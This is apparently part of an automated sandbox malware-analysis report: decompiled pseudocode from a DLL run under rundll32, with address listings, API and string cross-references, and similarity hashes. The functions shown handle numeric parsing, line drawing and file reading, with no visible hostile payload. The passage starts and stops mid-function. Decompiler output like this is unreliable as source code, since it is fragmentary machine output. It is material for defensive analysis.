																			_v8 = _t232 | 0x00000004;
																			goto L143;
																		}
																		__eflags = _t196 - _v16;
																		if(_t196 != _v16) {
																			goto L140;
																		}
																		__eflags = 0 - _v152;
																		if(__eflags < 0) {
																			goto L142;
																		}
																		if(__eflags > 0) {
																			goto L140;
																		}
																		__eflags = _t239 - _v156;
																		if(_t239 <= _v156) {
																			goto L142;
																		}
																		goto L140;
																	}
																	__eflags = _t212 - _t224;
																	if(_t212 < _t224) {
																		goto L141;
																	}
																	goto L135;
																}
																goto L122;
															}
															_t239 = _t237 | 0xffffffff;
															__eflags = _t239;
															goto L121;
														}
														_t200 = 0x660;
														__eflags = _t245 - 0x660;
														if(_t245 < 0x660) {
															goto L122;
														}
														__eflags = _t245 - _v148;
														if(_t245 >= _v148) {
															_t200 = _v24;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v28;
															if(_t245 < _v28) {
																goto L87;
															}
															_t200 = _v32;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v36;
															if(_t245 < _v36) {
																goto L87;
															}
															_t200 = _v40;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v44;
															if(_t245 < _v44) {
																goto L87;
															}
															_t200 = _v48;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v52;
															if(_t245 < _v52) {
																goto L87;
															}
															_t200 = _v56;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v60;
															if(_t245 < _v60) {
																goto L87;
															}
															_t200 = _v64;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v68;
															if(_t245 < _v68) {
																goto L87;
															}
															_t200 = _v72;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v76;
															if(_t245 < _v76) {
																goto L87;
															}
															_t200 = _v80;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v84;
															if(_t245 < _v84) {
																goto L87;
															}
															_t200 = _v88;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v92;
															if(_t245 < _v92) {
																goto L87;
															}
															_t200 = _v96;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v100;
															if(_t245 < _v100) {
																goto L87;
															}
															_t200 = _v104;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v108;
															if(_t245 < _v108) {
																goto L87;
															}
															_t200 = _v112;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v116;
															if(_t245 < _v116) {
																goto L87;
															}
															_t200 = _v120;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v124;
															if(_t245 < _v124) {
																goto L87;
															}
															_t200 = _v128;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v132;
															if(_t245 < _v132) {
																goto L87;
															}
															_t200 = _v136;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v140;
															if(_t245 >= _v140) {
																goto L122;
															}
														}
														goto L87;
													}
													_t239 = (_t245 & 0x0000ffff) - 0x30;
													goto L121;
													L122:
													_t238 = _t245 & 0x0000ffff;
													__eflags = _t238 - 0x41;
													if(_t238 < 0x41) {
														L125:
														_t133 = _t238 - 0x61; // -49
														_t187 = _t133;
														__eflags = _t187 - 0x19;
														if(_t187 > 0x19) {
															_t239 = _t238 | 0xffffffff;
															__eflags = _t239;
															goto L130;
														}
														L126:
														__eflags = _t187 - 0x19;
														if(_t187 <= 0x19) {
															_t238 = _t238 + 0xffffffe0;
															__eflags = _t238;
														}
														_t239 = _t238 + 0xffffffc9;
														goto L130;
													}
													__eflags = _t238 - 0x5a;
													if(_t238 > 0x5a) {
														goto L125;
													}
													_t132 = _t238 - 0x61; // -49
													_t187 = _t132;
													goto L126;
												}
											}
											__eflags = _t184 - 0x58;
											if(_t184 == 0x58) {
												goto L77;
											}
											__eflags = _t209;
											if(_t209 == 0) {
												_t209 = 8;
												_a16 = _t209;
											}
											E1000FB11( &_a8, _t184);
											goto L80;
										}
										__eflags = _t209;
										if(_t209 == 0) {
											_t209 = 0xa;
											_a16 = _t209;
										}
										goto L80;
									}
									L65:
									__eflags = _t220 - 0x19;
									if(_t220 <= 0x19) {
										_t182 = _t182 + 0xffffffe0;
										__eflags = _t182;
									}
									_t183 = _t182 + 0xffffffc9;
									goto L69;
								}
								__eflags = _t182 - 0x5a;
								if(_t182 > 0x5a) {
									goto L64;
								}
								_t85 = _t182 - 0x61; // 0x5ff
								_t220 = _t85;
								goto L65;
							}
							__eflags = _t245 - _v16;
							if(_t245 >= _v16) {
								__eflags = _t245 - _t219;
								if(_t245 >= _t219) {
									__eflags = _t245 - _v144;
									if(_t245 < _v144) {
										L28:
										_t183 = (_t245 & 0x0000ffff) - _t219;
										L60:
										__eflags = _t183 - 0xffffffff;
										if(_t183 != 0xffffffff) {
											goto L69;
										}
										goto L61;
									}
									_t183 = 0xffffffffffffffff;
									__eflags = 0xffffffffffffffff;
									goto L60;
								}
								__eflags = _t245 - 0x660;
								if(_t245 < 0x660) {
									goto L61;
								}
								__eflags = _t245 - _v148;
								if(_t245 >= _v148) {
									_t219 = _v24;
									__eflags = _t245 - _t219;
									if(_t245 < _t219) {
										goto L61;
									}
									__eflags = _t245 - _v28;
									if(_t245 >= _v28) {
										_t219 = _v32;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v36;
										if(_t245 < _v36) {
											goto L28;
										}
										_t219 = _v40;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v44;
										if(_t245 < _v44) {
											goto L28;
										}
										_t219 = _v48;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v52;
										if(_t245 < _v52) {
											goto L28;
										}
										_t219 = _v56;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v60;
										if(_t245 < _v60) {
											goto L28;
										}
										_t219 = _v64;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v68;
										if(_t245 < _v68) {
											goto L28;
										}
										_t219 = _v72;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v76;
										if(_t245 < _v76) {
											goto L28;
										}
										_t219 = _v80;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v84;
										if(_t245 < _v84) {
											goto L28;
										}
										_t219 = _v88;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v92;
										if(_t245 < _v92) {
											goto L28;
										}
										_t219 = _v96;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v100;
										if(_t245 < _v100) {
											goto L28;
										}
										_t219 = _v104;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v108;
										if(_t245 < _v108) {
											goto L28;
										}
										_t219 = _v112;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v116;
										if(_t245 < _v116) {
											goto L28;
										}
										_t219 = _v120;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v124;
										if(_t245 < _v124) {
											goto L28;
										}
										_t219 = _v128;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v132;
										if(_t245 < _v132) {
											goto L28;
										}
										_t219 = _v136;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v140;
										if(_t245 >= _v140) {
											goto L61;
										}
									}
									goto L28;
								}
								_t183 = (_t245 & 0x0000ffff) - 0x660;
								goto L60;
							}
							_t183 = (_t245 & 0x0000ffff) - _t237;
							goto L60;
						}
						__eflags = _t209 - 0x10;
						if(_t209 != 0x10) {
							goto L80;
						}
						goto L19;
					}
				}
				if(_t209 < _t236) {
					L4:
					 *((intOrPtr*)(E1002449E(_t253))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t253 = _t209 - 0x24;
				if(_t209 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x1000eff7
0x1000f01c
0x1000f01e
0x1000f020
0x1000f022
0x1000f022
0x1000f027
0x1000f02c
0x1000f02c
0x1000f036
0x1000f036
0x1000eff9
0x1000effe
0x1000f001
0x1000f037
0x1000f03a
0x1000f040
0x1000f047
0x1000f04a
0x1000f04d
0x1000f050
0x1000f056
0x1000f059
0x1000f066
0x1000f069
0x1000f06c
0x1000f072
0x1000f073
0x1000f075
0x1000f05e
0x1000f061
0x1000f064
0x1000f064
0x00000000
0x1000f064
0x1000f077
0x1000f07b
0x1000f07e
0x1000f082
0x1000f08b
0x1000f08f
0x1000f09e
0x00000000
0x1000f09e
0x00000000
0x1000f084
0x1000f086
0x1000f091
0x1000f091
0x1000f094
0x1000f097
0x1000f099
0x1000f0a1
0x1000f0a1
0x1000f0a8
0x1000f0ad
0x1000f0bc
0x1000f0c3
0x1000f0ca
0x1000f0d1
0x1000f0d8
0x1000f0df
0x1000f0e6
0x1000f0ed
0x1000f0f4
0x1000f0fb
0x1000f102
0x1000f109
0x1000f110
0x1000f117
0x1000f11e
0x1000f125
0x1000f12c
0x1000f133
0x1000f13a
0x1000f141
0x1000f148
0x1000f14f
0x1000f156
0x1000f15d
0x1000f164
0x1000f16b
0x1000f172
0x1000f179
0x1000f180
0x1000f18a
0x1000f194
0x1000f1a0
0x1000f1a1
0x1000f1a3
0x1000f1ae
0x1000f1ae
0x1000f1b1
0x1000f32f
0x1000f32f
0x1000f332
0x1000f335
0x1000f341
0x1000f341
0x1000f341
0x1000f344
0x1000f347
0x1000f356
0x1000f356
0x1000f359
0x1000f359
0x1000f35b
0x1000f369
0x1000f36c
0x1000f36f
0x1000f372
0x1000f375
0x1000f391
0x1000f391
0x1000f393
0x1000f397
0x1000f398
0x1000f398
0x1000f39b
0x1000f39e
0x1000f39e
0x1000f3a1
0x1000f3a4
0x1000f3a4
0x1000f3a6
0x1000f3a7
0x1000f3a8
0x1000f3aa
0x1000f3b6
0x1000f3bc
0x1000f3c1
0x1000f3c9
0x1000f3cf
0x1000f3d1
0x1000f3d3
0x1000f3d6
0x1000f3dc
0x1000f3dc
0x1000f3df
0x00000000
0x00000000
0x1000f3e7
0x1000f3e8
0x1000f3eb
0x1000f3f8
0x1000f3fd
0x1000f400
0x1000f54c
0x1000f553
0x1000f41d
0x1000f420
0x1000f55c
0x1000f55c
0x1000f55f
0x1000f58b
0x1000f58b
0x1000f58e
0x1000f61d
0x1000f621
0x1000f626
0x1000f629
0x1000f62b
0x1000f63c
0x1000f63f
0x1000f64d
0x1000f64f
0x1000f684
0x1000f688
0x1000f68a
0x1000f68c
0x1000f68f
0x1000f68f
0x1000f691
0x1000f691
0x1000f698
0x1000f6a4
0x1000f6a4
0x00000000
0x1000f698
0x1000f656
0x1000f65c
0x1000f65f
0x1000f661
0x1000f66b
0x1000f66d
0x1000f678
0x1000f678
0x1000f67b
0x1000f66f
0x1000f66f
0x1000f671
0x1000f671
0x1000f680
0x1000f680
0x00000000
0x1000f680
0x1000f663
0x1000f666
0x00000000
0x1000f666
0x1000f633
0x1000f636
0x1000f638
0x00000000
0x1000f638
0x1000f594
0x1000f597
0x00000000
0x00000000
0x1000f5a0
0x1000f5a3
0x1000f5a6
0x1000f5a8
0x1000f5ab
0x1000f5ae
0x1000f5dd
0x1000f5dd
0x1000f5df
0x1000f5f6
0x1000f5f6
0x1000f5f8
0x1000f5fb
0x1000f5fd
0x1000f600
0x1000f600
0x1000f603
0x1000f609
0x1000f60e
0x1000f614
0x1000f617
0x00000000
0x1000f617
0x1000f5b0
0x1000f5b6
0x1000f5b6
0x1000f5b8
0x1000f5d5
0x1000f5d8
0x00000000
0x1000f5d8
0x1000f5ba
0x1000f5bd
0x00000000
0x00000000
0x1000f5c3
0x1000f5c9
0x00000000
0x00000000
0x1000f5cb
0x00000000
0x00000000
0x1000f5cd
0x1000f5d3
0x00000000
0x00000000
0x00000000
0x1000f5d3
0x1000f5b2
0x1000f5b4
0x00000000
0x00000000
0x00000000
0x1000f5b4
0x00000000
0x1000f55f
0x1000f559
0x1000f559
0x00000000
0x1000f559
0x1000f406
0x1000f40b
0x1000f40e
0x00000000
0x00000000
0x1000f414
0x1000f41b
0x1000f427
0x1000f42a
0x1000f42d
0x00000000
0x00000000
0x1000f433
0x1000f437
0x00000000
0x00000000
0x1000f439
0x1000f43c
0x1000f43f
0x00000000
0x00000000
0x1000f445
0x1000f449
0x00000000
0x00000000
0x1000f44b
0x1000f44e
0x1000f451
0x00000000
0x00000000
0x1000f457
0x1000f45b
0x00000000
0x00000000
0x1000f45d
0x1000f460
0x1000f463
0x00000000
0x00000000
0x1000f469
0x1000f46d
0x00000000
0x00000000
0x1000f46f
0x1000f472
0x1000f475
0x00000000
0x00000000
0x1000f47b
0x1000f47f
0x00000000
0x00000000
0x1000f481
0x1000f484
0x1000f487
0x00000000
0x00000000
0x1000f48d
0x1000f491
0x00000000
0x00000000
0x1000f493
0x1000f496
0x1000f499
0x00000000
0x00000000
0x1000f49f
0x1000f4a3
0x00000000
0x00000000
0x1000f4a9
0x1000f4ac
0x1000f4af
0x00000000
0x00000000
0x1000f4b5
0x1000f4b9
0x00000000
0x00000000
0x1000f4bf
0x1000f4c2
0x1000f4c5
0x00000000
0x00000000
0x1000f4cb
0x1000f4cf
0x00000000
0x00000000
0x1000f4d5
0x1000f4d8
0x1000f4db
0x00000000
0x00000000
0x1000f4e1
0x1000f4e5
0x00000000
0x00000000
0x1000f4eb
0x1000f4ee
0x1000f4f1
0x00000000
0x00000000
0x1000f4f3
0x1000f4f7
0x00000000
0x00000000
0x1000f4fd
0x1000f500
0x1000f503
0x00000000
0x00000000
0x1000f505
0x1000f509
0x00000000
0x00000000
0x1000f50f
0x1000f512
0x1000f515
0x00000000
0x00000000
0x1000f517
0x1000f51b
0x00000000
0x00000000
0x1000f521
0x1000f524
0x1000f527
0x00000000
0x00000000
0x1000f529
0x1000f52d
0x00000000
0x00000000
0x1000f533
0x1000f539
0x1000f53c
0x00000000
0x00000000
0x1000f53e
0x1000f545
0x00000000
0x00000000
0x1000f547
0x00000000
0x1000f41b
0x1000f3f0
0x00000000
0x1000f561
0x1000f561
0x1000f564
0x1000f567
0x1000f573
0x1000f573
0x1000f573
0x1000f576
0x1000f579
0x1000f588
0x1000f588
0x00000000
0x1000f588
0x1000f57b
0x1000f57b
0x1000f57e
0x1000f580
0x1000f580
0x1000f580
0x1000f583
0x00000000
0x1000f583
0x1000f569
0x1000f56c
0x00000000
0x00000000
0x1000f56e
0x1000f56e
0x00000000
0x1000f56e
0x1000f3dc
0x1000f377
0x1000f37a
0x00000000
0x00000000
0x1000f37c
0x1000f37e
0x1000f382
0x1000f383
0x1000f383
0x1000f38a
0x00000000
0x1000f38a
0x1000f35d
0x1000f35f
0x1000f363
0x1000f364
0x1000f364
0x00000000
0x1000f35f
0x1000f349
0x1000f349
0x1000f34c
0x1000f34e
0x1000f34e
0x1000f34e
0x1000f351
0x00000000
0x1000f351
0x1000f337
0x1000f33a
0x00000000
0x00000000
0x1000f33c
0x1000f33c
0x00000000
0x1000f33c
0x1000f1b7
0x1000f1bb
0x1000f1c7
0x1000f1ca
0x1000f31a
0x1000f321
0x1000f201
0x1000f204
0x1000f32a
0x1000f32a
0x1000f32d
0x00000000
0x00000000
0x00000000
0x1000f32d
0x1000f327
0x1000f327
0x00000000
0x1000f327
0x1000f1d0
0x1000f1d3
0x00000000
0x00000000
0x1000f1d9
0x1000f1e0
0x1000f1ef
0x1000f1f2
0x1000f1f5
0x00000000
0x00000000
0x1000f1fb
0x1000f1ff
0x1000f20b
0x1000f20e
0x1000f211
0x00000000
0x00000000
0x1000f217
0x1000f21b
0x00000000
0x00000000
0x1000f21d
0x1000f220
0x1000f223
0x00000000
0x00000000
0x1000f229
0x1000f22d
0x00000000
0x00000000
0x1000f22f
0x1000f232
0x1000f235
0x00000000
0x00000000
0x1000f23b
0x1000f23f
0x00000000
0x00000000
0x1000f241
0x1000f244
0x1000f247
0x00000000
0x00000000
0x1000f24d
0x1000f251
0x00000000
0x00000000
0x1000f253
0x1000f256
0x1000f259
0x00000000
0x00000000
0x1000f25f
0x1000f263
0x00000000
0x00000000
0x1000f265
0x1000f268
0x1000f26b
0x00000000
0x00000000
0x1000f271
0x1000f275
0x00000000
0x00000000
0x1000f277
0x1000f27a
0x1000f27d
0x00000000
0x00000000
0x1000f283
0x1000f287
0x00000000
0x00000000
0x1000f28d
0x1000f290
0x1000f293
0x00000000
0x00000000
0x1000f299
0x1000f29d
0x00000000
0x00000000
0x1000f2a3
0x1000f2a6
0x1000f2a9
0x00000000
0x00000000
0x1000f2af
0x1000f2b3
0x00000000
0x00000000
0x1000f2b9
0x1000f2bc
0x1000f2bf
0x00000000
0x00000000
0x1000f2c1
0x1000f2c5
0x00000000
0x00000000
0x1000f2cb
0x1000f2ce
0x1000f2d1
0x00000000
0x00000000
0x1000f2d3
0x1000f2d7
0x00000000
0x00000000
0x1000f2dd
0x1000f2e0
0x1000f2e3
0x00000000
0x00000000
0x1000f2e5
0x1000f2e9
0x00000000
0x00000000
0x1000f2ef
0x1000f2f2
0x1000f2f5
0x00000000
0x00000000
0x1000f2f7
0x1000f2fb
0x00000000
0x00000000
0x1000f301
0x1000f307
0x1000f30a
0x00000000
0x00000000
0x1000f30c
0x1000f313
0x00000000
0x00000000
0x1000f315
0x00000000
0x1000f1ff
0x1000f1e5
0x00000000
0x1000f1e5
0x1000f1c0
0x00000000
0x1000f1c0
0x1000f1a5
0x1000f1a8
0x00000000
0x00000000
0x00000000
0x1000f1a8
0x1000f082
0x1000f005
0x1000f00c
0x1000f011
0x1000f017
0x00000000
0x1000f017
0x1000f007
0x1000f00a
0x00000000
0x00000000
0x00000000

APIs

__aulldvrm.LIBCMT ref: 1000F3BC

Strings

p, xrefs: 1000F133
:, xrefs: 1000F0A1
f, xrefs: 1000F0E6
f, xrefs: 1000F0CA
p, xrefs: 1000F0D1
p, xrefs: 1000F0ED
f, xrefs: 1000F12C

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction ID: e40459f71609af27f955baf17b6dca83de0bb25eb23cd22cff97dc1eb6c4fdf7
Opcode Fuzzy Hash: 350fe8e4ff33367bb6dfe719a0ccd67005cbf78c354b2737ca42fbadf5c2dbbf
Instruction Fuzzy Hash: EF028475E00259CAFF60CFA4D8486FDB7B2FB40B94FA1811DD424BB689D7705E84AB11

Uniqueness

Uniqueness Score: -1.00%

Function 100015F8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100015F8(void* __ecx, struct HWND__* _a4, int _a12, int _a16) {
				int _v8;
				int _v12;
				intOrPtr _t20;
				intOrPtr _t33;
				void* _t35;
				struct HDC__* _t40;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t33 =  *0x1004dc38; // 0x483c70
					_t4 = _t33 + 4; // 0x483c70
					_t20 =  *_t4;
					_t5 = _t20 + 8; // 0x0
					_t6 = _t20 + 0xc; // 0x0
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t35, _t33);
					_t40 = GetDC(_a4);
					MoveToEx(_t40,  *_t5,  *_t6, 0);
					LineTo(_t40, _v12, _v8);
					ReleaseDC(_a4, _t40);
				}
				return 0;
			}

0x1000161f
0x1000162a
0x10001633
0x10001633
0x10001636
0x10001639
0x1000163f
0x10001645
0x1000164b
0x10001652
0x10001663
0x10001667
0x10001674
0x1000167e
0x10001686
0x1000168a

APIs

GetMenu.USER32 ref: 10001600
GetSubMenu.USER32 ref: 10001609
GetMenuState.USER32(00000000,000000CB,00000000), ref: 10001617

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 1000165A
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001667
LineTo.GDI32(00000000,?,?), ref: 10001674
ReleaseDC.USER32(?,00000000), ref: 1000167E

Strings

p<H, xrefs: 1000162A, 1000164D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateLineMoveReleaseState
String ID: p<H
API String ID: 2409786466-2688811295
Opcode ID: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction ID: b7c906b1751459d05ed15d7226b6fca836a6211401a0122071cd1be87b3306df
Opcode Fuzzy Hash: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction Fuzzy Hash: 86115E75600118BFEB019FA4CE89FDA7FB9EF0A395F158055FA01D6160C7B19D40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10039C35, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10039C35(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E1002448B(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E1002449E( *_t137))) = 9;
						L60:
						_t139 = E1000E314();
						goto L61;
					}
					__eflags = _t198 -  *0x1004e828; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x1004e628 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E1002448B(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
								E1000E314();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E10024214(_t154);
								E100268B3(0);
								E100268B3(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E1003948F(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x1004e628 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E100331B8(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E10024468(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E1002449E(__eflags))) = 9;
											 *(E1002448B(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E1003973E();
												} else {
													_t170 = E10039AA6();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E1003994F(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x1004e628 + _v12 * 4));
